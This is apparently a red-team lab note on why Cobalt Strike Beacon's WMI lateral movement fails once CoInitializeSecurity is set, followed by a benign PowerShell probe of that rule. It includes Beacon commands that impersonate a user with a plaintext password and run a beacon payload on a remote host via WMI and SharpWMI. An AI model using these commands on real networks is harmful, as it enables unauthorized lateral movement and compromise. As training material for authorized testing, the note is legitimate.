Secondary Categories: 02 - Lateral Movement, 02 - Persistence, 02 - Privilege Escalation
Links: Beacon Object Files, Component Object Model (COM)
Search Tag:
CoInitializeSecurity
Description:
Cobalt Strike
Beacon's internal implementation of WMI uses a Beacon Object File, executed with the beacon_inline_execute Aggressor function. When a BOF runs it may call the COM function CoInitializeSecurity, which sets the security context for the whole process. According to Microsoft's documentation, this can only be called once per process. The unfortunate consequence is that once CoInitializeSecurity has been called in the context of, say, "User A", later BOFs may not be able to use a different security context ("User B") for the lifetime of the Beacon process.
An example of that can look like the following:
```
beacon> make_token DEV\jking Qwerty123
[+] Impersonated DEV\bfarmer

beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
CoInitializeSecurity already called. Thread token (if there is one) may not get used
[-] Could not connect to web.dev.cyberbotic.io: 5
```
We know `jking` is a local admin on WEB, but because `CoInitializeSecurity` has already been called (probably in the context of `bfarmer`), WMI fails with access denied (error code 5). As a workaround, your WMI execution needs to come from a different process. This can be achieved with commands such as `spawn` and `spawnas`, or even `execute-assembly` with a tool such as SharpWMI.
```
beacon> execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=web.dev.cyberbotic.io command="C:\Windows\smb_x64.exe"
[*] Host                        : web.dev.cyberbotic.io
[*] Command                     : C:\Windows\smb_x64.exe
[*] Creation of process returned : 0
[*] Process ID                  : 3436
```
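A quick way to see the once-per-process rule for yourself, as an added example that is not from the original note or from Cobalt Strike: a PowerShell P/Invoke probe that calls CoInitializeSecurity twice and decodes the HRESULTs. The Win32 constants are the real values; `Invoke-CoInitializeSecurity` and `Describe-HResult` are helper names made up for this example.

```powershell
# Added example, not part of the original note: probe the once-per-process
# rule by calling CoInitializeSecurity twice via P/Invoke. On a fresh process
# the first call succeeds and the second returns RPC_E_TOO_LATE; if the host
# has already initialised COM security, even the first call returns it, which
# is exactly the state the Beacon message above reports.
$sig = @'
[DllImport("ole32.dll")]
public static extern int CoInitializeEx(IntPtr pvReserved, uint dwCoInit);

[DllImport("ole32.dll")]
public static extern int CoInitializeSecurity(
    IntPtr pSecDesc, int cAuthSvc, IntPtr asAuthSvc, IntPtr pReserved1,
    uint dwAuthnLevel, uint dwImpLevel, IntPtr pAuthList,
    uint dwCapabilities, IntPtr pReserved3);
'@
$ole32 = Add-Type -MemberDefinition $sig -Name 'Ole32' -Namespace 'ComProbe' -PassThru

# Win32 constants. PowerShell parses 0x80010119 as a negative Int32, which is
# exactly what the int-returning P/Invoke hands back, so -eq works directly.
$RPC_E_TOO_LATE              = 0x80010119
$COINIT_MULTITHREADED        = 0x0
$RPC_C_AUTHN_LEVEL_DEFAULT   = 0
$RPC_C_IMP_LEVEL_IMPERSONATE = 3
$EOAC_NONE                   = 0

function Invoke-CoInitializeSecurity {
    # Example helper: the settings a typical WMI/DCOM client would pass.
    $ole32::CoInitializeSecurity([IntPtr]::Zero, -1, [IntPtr]::Zero, [IntPtr]::Zero,
        $RPC_C_AUTHN_LEVEL_DEFAULT, $RPC_C_IMP_LEVEL_IMPERSONATE,
        [IntPtr]::Zero, $EOAC_NONE, [IntPtr]::Zero)
}

function Describe-HResult([int]$hr) {
    # Example helper: name the two results that matter here.
    if ($hr -eq 0)               { return 'S_OK: this call set the process security context' }
    if ($hr -eq $RPC_E_TOO_LATE) { return 'RPC_E_TOO_LATE: already initialised in this process' }
    return ('0x{0:X8}' -f $hr)
}

# COM must be initialised on the calling thread first (S_FALSE = 1 is fine).
[void]($ole32::CoInitializeEx([IntPtr]::Zero, $COINIT_MULTITHREADED))

$first  = Invoke-CoInitializeSecurity
$second = Invoke-CoInitializeSecurity   # always too late by now

"First  CoInitializeSecurity : $(Describe-HResult $first)"
"Second CoInitializeSecurity : $(Describe-HResult $second)"
```

Run it in a fresh powershell.exe to see the S_OK then RPC_E_TOO_LATE pair; the second result is the reason a new process (spawn, spawnas, execute-assembly) is needed to pick up a different token.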
Resources:
| Title | URL |
|---|---|
| place | holder |
Created Date: November 17th 2022 23:19
Last Modified Date: November 17th 2022 23:19